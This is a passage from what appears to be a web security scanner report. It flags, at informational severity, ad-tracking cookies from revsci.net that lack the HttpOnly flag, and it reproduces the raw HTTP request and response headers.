tgKZu9MKmacg4YVlY03UeUADPfutMyUtVS1wq1GHOPBfFrR0kIOJbSgZ9xhO0aZJVSvJuV49SBx5RXvaFtMTwJswlVgYXC4g16065gXVPuchoSFj3K+S8wActYQK/DIKBHfBjb/ev2/8pmYPG8taqCPkMfcQKupIGKr8TDfLCtguMlDo03wjJwPwk7kd+/MSDOLymwKKsf8oRqrItLFkbAU3F/ApFOsJbRXT7DsxYTtkHwF6sHllGu6Lzifu6FVcsDIeYnnPySPZXhCS85H2oUykxygt1b7i5aOGOuBcOTrXYgeScbQ3GWaQitLg3RoOsZZEYogBodyb3d4MdcFGQnbeKiEs2fyeAxCpg3KceiFBbbFNEPPFfWjJ2px4ZAHySRcW1gJ1LEml++zXq5EKllvOpwkyr2QeubD6yiYESQFDeMklVwbvFuULphCBvQsbvCk+xocxTvtHgwoRNqb6oDgNOpen2sOJ///1Yl0FFVuxNPD1Tp3kfzXxo+U8QK0WRFZbvd5ugerQRgJTKV0BcTxpNLUxM6yGwUeZymPUCP2b/KMoKRn/fQ7WJuczYg216QJ5mQr+0CPxRGnMwnlvsfheJVWDvjCE/NqYO"; rsi_us_1000000="pUMV4y9DPxYULWF0UBr2EFb5ofBLgcZpb/18uFL7SRGZRw8snkZOAxE7zS7H8JALWh1xIYKL2OZ1rJkKmhq+uW8FZZicGys92kgJzUyVvYczXwU63BAAzCO5a/Ue/ucli2qqZPDtihbQa5yaAmF8JtQyx/p7Inc8BlEfDReqXeKxKeb2blOovtcHtGU3G3NLbG9rAA+8UULrQ/nSOANRu+WyKjyhtkmsyLCzlahUWrBKfsEvHYkTlwHEyugQl9u11JF4gSkeXN0/ryuwj1UG0gMw3kqvmIlhRfQXfCzaPULrx+3zdYu0rNPMtPhjTDML9ymL/7QMckLC8lc3MDR7/MISYp+OAAZdw0RV1crYOE+3MyRdYJsFVBQoq2N18vfSdW3eory+NxYx/QaWelhhe+J+dHfzOr2IMhF5beDN0G7vKEiYasK5qJSXVhiyTItewSfEh2kMhEJg2GVfFWD+nIOlkEco8XoK8rcUZlB0wA33b2K2NKpPAuXZQJ+29sHEYTdKz+gnnveasa7G5+23g43yxoyWXo7QT4Ek2oXz3dJ95CDHRKabVhrt6NyRpdNhDPHK2DGr4eMqNbgdl55hWVMmLFnm7D6QXj1OdGcZNzAO182q2LXOApnqtkufNG/bomZat7BSgIy+u/RebOgQe7ws1R7LVqr7Z9ZyYISyWuR706WIzxvyJyvRQ225QNQyeO7Rm6zOnqtpJNr+Wl8dvuAXJnOF8cKvc68OZk64/Y9E4jDPRmGr+0x9uHLznY+lY+wXGh4+VwSWn14Bz1zY2w7n2zxQVw62gXPaEuZXtl/a9ICPgVNqYytupBKasgkwNh7wXQpySDJHwxV/n/j0XaJXXQzHVQzHoWnk8I6q06XIEId89mhMyBpc6k+LS+zntufcFexH/9uS12mcSH2n6HtKpEvbmBJQT/+qjmkBUply54nQ7lshdDSl1zth7EzAOhgRNGUi8vZ5YC6rQlT+ihN11HT3P6E4MA3XTebAGNEgJ4PdHrYX9ls0lFGP+QOnm16RInQK/KA53yKB/t4pzCsGdiei/OvLo3EbRQzJvygo4CdELrjrAoVqxoLwrF6YCdfp1f3adzWIfQxPuY67SlY+5YnwFKAMSKoiv2LM6+/JXLdYgYbqf/MSCoTBjD/T+6p0eYGx1W0q3Q+Squ/RFDRKA3hkcqVBsrWy3vyY0q/Mw9rzaHx5/40UoNLmNj4uhoJcV9JTmCwAFhhW6oSIYClB8ZEP3u3uhSpZRJzKVYgAutWdMNjYsXt3sCW5dMJnImphPACaDKHFX1/+gbeF2O2xlmUCRt/YCsqY0BzXYGyIU9ZFZAO3omI2SNKVkUfAYdTJl77lZ4kr67QARbiBk2rHkyQ1WiXt+QNLovV1ooc45d82JTRHOwIKgOx5yIo30DPC8M6gceM7Jz4lzefgOkbtbjiXyYhIm8CEKHbYEEZJapwXzfyOlfUljVLhZ8rMbzwXqVU49oKn6mmLTJTMAED9zKr9teWmAVy6A/ER3pcK5y3Ef03xSPuE2NFabbUC7sXriV2PB8zUkygEXtx5TLZrQfCk++okG0yb76XDSPjmgntZ1R4iV3Ch1vXbRUXxXz0SMai34OUEWwnSnF8aqr4m/XpwD/df250UCkj1oBJ1uCvP4zF7tLaLok03kDKKrOmzZydBGdOLVT1xfQz/K+IIEFzCj3coJjxzdOuMzbXVjGC0QP+vzmAVRPgTLWbAWZ3MpEgqZ/EeXWeITYMXjSfzWt2RzbLSDVnZIOU+6aceqIidIYqvbInejsid/R/BBvtAae+8+ymWAOYQ+kjG+NJLUtZa07yqTwCgKq8cHW51Z8l5lqGCN7Nrdg=="; rtc_t2EC=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; rsi_segs_1000000=pUPF4kmheXIQJvAtY6hK+mkCZPosg7ZjSjmgIGrY2pRiGzONZ94XQaTp/yWdxq+jjO/JAaatzgqqQQPzdZ6yqQR662XPvNKPv1Rqh9jA/v14pxLXAWEgoOqnGxC0L5lH0qtoLkyjOn5MHIKKOXRa+zdM/64ivKuCUdWRNaiwzQUZsPL4yqWFj8yeZiSgxO0hFnzZ/Y9aUs4uJNb/DQygvC6YBlUoo6pZype7eFDChF6wyqagbxiaqAFzltOxzOdqmZu3YLXJgph2RtT5HlfjivxZMS5K0tnPYc5QR/NXOs1ILOVOvIWigRJ0x5IhH1HhwuQSe9btcf0bCNcVP4HZi8O2AmX2Jc8Q5+6q+Q1E443mNe0zUVBMHyHjeZSEldrwPTCovX/zX0q4+NqSHWgzhVTqMsXrzxuir4UupXv4oyRzBvirDmCrPk2Y9JSPnsCzrtQ/Bb831pLYZiuXruqOg8rgXPDGVSSlkqg8lMb4AQplTZlqJ12NQm6l2Mr6kpmoZbk3l+9GGg4HvvsaymSSj4DYhOZpVvdYNhzZjgQ8yCrkQLuuptRfdpcxlr2fYtniFHQH/iCkkq3NECmZkuMBe8pDCAdn7nhoeOVxTfawTsncGe3PDqwvxHAHJRpePVGq032aL1/fakg1i70GnTPM+J5qEXnhcSTSJ9Ulk6xz0tSHuN/0Src41WHZpSkFcs/LpH/ROrAYGHeBuoyBr5VFqidpEYkdaaRRsqeTFjFJxouf1XDicU3ZtoMnr91x8D/697EdL0BlFyaGYfavzOacTjTqbVMbcSXglY/O1yL+oTBbldOIaAsX84GQL41KT9r9YX42ZNrvp6BWC8h/f4/1NnkBOEShvA==; udm_0=MLv39yEJZjpv597JwHIRqQjgYATtJkLnfaGGH+sXeVhoTqnXBF+Nd1a01tm80x2HLZWonp6/V2RHIlU34pHGe/rw5hHxIW3vVBdxt92l+vXlcmbnRIM/RrRkWwbT0ifun7uy9RztFswfjs+KV0iM4QczKvZEh3usGbMBmcJrufLfkPcAXtvzO++vSEin7/lQFDpbQSH7GZfD5vEp+tXTU7xMo6S3PMzDC/Z4+1qiZ1K+47dP5wseAL2HD5anm/bf2IyW0j8nfQMEeMMvVP/hTRZbrCiPom8hmJ/nl3NlzlqrZ4F1SDprjHiS+gYXKCqjfBEgUJo+55bYmIN2Vi/xnnIOiFiX3eAt71YVh/w83uBEVJW00dM5Q0ETrisxbtJIvOnCldc1I/9/QZKipfIWzloa/U+roRTBHVAqkWtHNekwVRJBqrL5B/mQPUoSEP78DniKkLh7Ds9XPBBbexdFIHFIfmpU6yYmGdVwFcueFD1S2wPw6wYVweqpy1xtADdnoLkMlKl7bq8tAlb4g3tHFY8rFeq1kYGPFPb5cv/YTZi/gy/jGuiA1s3yrGmJbvTi0mf2WCD8VbG011u0g6a4S184eRXYlWDTQn4vFgMs9L9CipeXlxmi5NmLRjvOeB+gku/TnXSA0WhoEy2qNdpbWyS1Ejok4rB3wsdkqYmp8C7jQMxjX8Zah8CbAVTljv3UZLiUqK34clxVHxPpozqFzmOtrMXQwZI6UGsFQTh6vihXry1FVIslnpJJ+fy6no609BNM29jCIchvgOiglzqPanPnDi4jQfviYBBmy7nzwxKgPVjwBLqPy6twjINqq+OfJNqjtwv/r5mAgJIYW/WMmejpYlichqhvICbuoyZ+9JdnXziTla+IlXyheLWx1a0jKTVqQJiaWJIuBt8L1kLG6KfvmUd919OTYHu7hKtTddmI/PmHs4jbVQQ+SbqEzVhEdFTvbVkH71M/t3izI2upipoP2Mo0v4wpHvNtIdKCxqZVbTtqCTlrr8HVi24ph6OaF+/RH0xMIFvr7j8pWmV534nlMJ7Yh/XMqUOgINXifYA4RXnj9qH4SEiZqVvlK0LrrBz/q8iEj+pzzRIv54IZLsOnxr/aNm4AY2zv+KN+t/YAUep+BCxakF1I+31Bf8RBcKO01w6B6wQ0lSvD5sfcBHWs5ZICGiZigNmqxngzlLvS78PxGGleIUBoYEYe//f2obKus2cI/PdSs0wCzEgF7LX/ub9Lu1zTLz0ZxPLSybIGU9nc3whHwAenW5HJ4HvB39Ok4iPTje85reavKAENWDRrHwFMXPU4aktzrsp8/z+OKbTy+dr34fbdoKvdDkdFs417FDGBOP1sAordIPxxRa9NXtbf0rIVozAT67DiE0yv306/1PEzEOpgro2Gf83lJk0rDBwcnDvJqM7rPNH6OMv8E4HG09jNnSsLWugAvKfPgv5ysEHWJz3pY9vyXxhHSMjjheRs/kBLhu8IM/dq/uRCbEAnXo6jzQk/45Cvi9Vjie0hnfkEt5cmGEHEWxyM9H28Dew1Z9IFFrBEGc4pu2TMUb+fTQ75RxDqV3zM1G9tQGISMJ3rrbJrjlrFg8QgEOGT3GVsq+U+sQvFFc1ra9aGn2y13m2Y

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_t2EC=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4T+henIMH/C1v6FY5BBd22rQpqLhiqk7K1iol7fFqYeyPGROzsNp8jU3xj9gP1Bii2V/DBWvrpjBAy5DI8TAgLRReMSoKtfWOnTJm4rKExNlxnnCIEgnEzpZRgLGHztIAcOn4Kj3s8DlJ8eZre8Ul77CqmqUAVrVYHXu7N2xJU52T0yfauA9msUiV8ZlspgapDeLnplbVyF11jkhoPJUYxrxVENz/3cavxfxN5MVFr/q3pEI81eGG7OuiTpQruH3bMcDXgjl63mIzCytNXO4UVwy2rOL+Rc1IPdRaAZBuZhCCfPg1dG3SsLE1KxZL3dsJfg9j8MdMoAQkh5l00ljLMtdEAjmL24j1eG67Q8IOIi2phaT7iKeuSVaDKK8YdXrJdV8w6UZbFjULPW6glXfzf1g6VLOnuL37J14WhwAZuI73NvJMNhetrtpQtGM+RdsWwHvtXF6qF3l8F/+4VRNIxbpyu9HDRDbKR88Hqh/zokfrg4FxGILUOY6m7WL0/FBU2UnwdZGqqcBsTl6/y+CD1aVxirF71RHh7atWk0VHzMpUf1uikMher+6DCCUzSjsPq7StIuJDWDVv/eohzY+/6eb7cZVRB5SPlbW0Gk09/iGrMGoO2rFiHRggcj1Dzk5iCAONgC3WTANF/QHjyNSrICUZuk3Bxvl8pZKhuQMVEyf26k08eXVESj9CNtkUiTXKlXLJ3xn/dBLKr3iHqV+EgbKG/CfAl/zWL93eJCnXWEPLmi9q0W3+Z8N6eRH4WI2WrzpvNfhNp107U7zLC99LEl5dJqIz5sBpCtDQ6GosGQbA+wAxevKcwXBtvRPNwP0QgHjS3ow450/X7Q3YNC4FW6LKU4/99svgYzmk35W6Q==; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:33:59 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_te28=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:33:59 GMT; Path=/
Set-Cookie: udm_0=MLv39zEJZjpn5t6vNwncn9MhLgTtJkLnfaGGH/uMZJ8AwsYAEF/Nd7YLMgsVAcRzxwECz1oh0wkiAClDYIsqRs6BgFDOJIIh0Oxd/Kn0pvn6ci0/UwRfalAR/RpHXwCSuEsivhjo9oj7EswW7/qBqITrGcpGV3UHKPwPplpsMqaib+YKahHXVEv3xl6Bo27HVOK4HJGQNRWs/E3+40bkqNniVQFsy5QhCefBMQW7DFCzIRnm5LtbU+NxkZ2uHx8enayb83GwpgBf8uEN/0ulbWZ65ldVR9zoe8V5Fy29JmcKmTFpyMZi1X5/bzFVRvFXee0DtvElgvfrvNWSBU3cTr4Ppwp3vZ3Rp2WX5Abg+bgMOGuzIljqdeJrA3KiZTcGUsm9xBQPqnqmNlbmKl8WHinyRdCb0A4rHcb4ZBIsyUr2p9AuUSVZ+KQehEO3u+z03auEHa4bJx1SGc2DmLQCgI1wZYHe2FH6XZKG+O3WT9PttLbzWOz0c+kE+7nUw/R2INSVi64TVjxaU0z8vU+ghlG5ggvs1G8J6fpsglKJgJ4uUpeag8XxSqQZja/q6W3p2oszpP+bvUN0Cp+OMQ2uYTCWgHPszrg4Ga9TDaGBlH8AtyDvg4+q2XdL9GLA4PtpX+RNR82zyVf565QvP4bQ3DdukKvFcsmJK9rFIe/HuC1hJ3P4Z5sJJTX84vbBUCDWxN6kO69ol1+wDsydO9QkT/bJv8B3vIietOthU9qZvXeBv6XZIuqm3jybhtcl99mYmxImAl+JwF/5IrrOE3pwGLI5S3eH7tt2XXS6G8908Nd8DpJU9ekqxFjl7RcXiSWAqhzm4/Mdga1506akM9SvtLrdQLyPXHSYp//jZIyJwv7s9h8/OCMIdc6JDoaiiyKEu6zddHt7/J5AxKBkpo3KsWi2iPm97gTKiIdUsULLlhLe/UFKQk6kHwXEf2vG5MLwGqNnNUmZlWdTJj82XNdMfil1CrEog7hnYyyun364a/sItloQJSLBnab0HW9o/BzSiNEgMKcvEqoXQladTkdT6oFZuBhUPFXJlrsTTD1hIqU9K4yc9SIj6xTXFbXxaXv3th1aetCaMi0Aj9amw/QY9UuxdnipWEYGleG7HNsL+d7Zt151Fjkn0KmKm5xQW9ELvUk+FrIF4yp3UGc7oIh9Q73MwkBptYQmPrB8/AExGZzv/tHuDTw+ynnDuAHkNiNx54czMt45jd3dgE3RKrgbi5vRkWa+9TzOA5WS2T9xPWfwbxmjxBSuWREtLOZgfBeTOFxQYythf7KtRkzfxC0OPRgZzfxvS4ExvREEr0EUcf8LWwore2+Vh5Ovk5XZwMWk4V87gH45mHzP0S17y4ltrXAev4c5NuC+om7vK/s/T8ozR53Kl/v9q5cpZCN+IXUHkTxGvxdtySJY9ALM0X8XOwANBmXPxqtj03G6ryeEOtGNR+lUBRYa0tz4PLYpPEyyBKTCPIhpwrkyphcullDyiho3FZOuzaLJjPvF9/7WpG0gZQPwDFHKQiiH4ypbNX+jsMDdb7ABVrj/UjUsYLVm+uARUIPVNcTVtHDo2RQjOOa//sAUA0Hy2HCHKceHqZ0R+lmZaMVVELwCtTJNSiIp8XVd+GgRc/bEXYHjIeF0v+6nHFzp4wHliC2p5H03V92VOU7T58LwDAFKgJNI0+2gxZPN1L4mZA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:33:59 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 13:33:59 GMT

GIF89a.............!.......,...........D..;
9.79. http://pix04.revsci.net/G07610/b3/0/3/1003161/269685231.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /G07610/b3/0/3/1003161/269685231.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /G07610/b3/0/3/1003161/269685231.gif?D=DM_LOC%3Dhttp%253A%252F%252Fwww.examiner.com%252Ffight-sports-in-national%252Fcomplete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds%253Fbpid%253DS0277%2526Headline%253DComplete%252520WWE%252520SmackDown%252520Spoilers%252520for%252520Friday%252520May%25252013th%25252C%252520New%252520'face'%252520and%252520new%252520feuds%2526Writer%252520Topic%253DFight%252520Sports%2526Place%253DNational%2526Channel%253DSports%2526SubChannel%253DFight%252520Sports%2526City-State%253D%2526Section%253DFight%252520Sports%2526_rsiL%253D0%26DM_EOM%3D1&C=G07610 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; 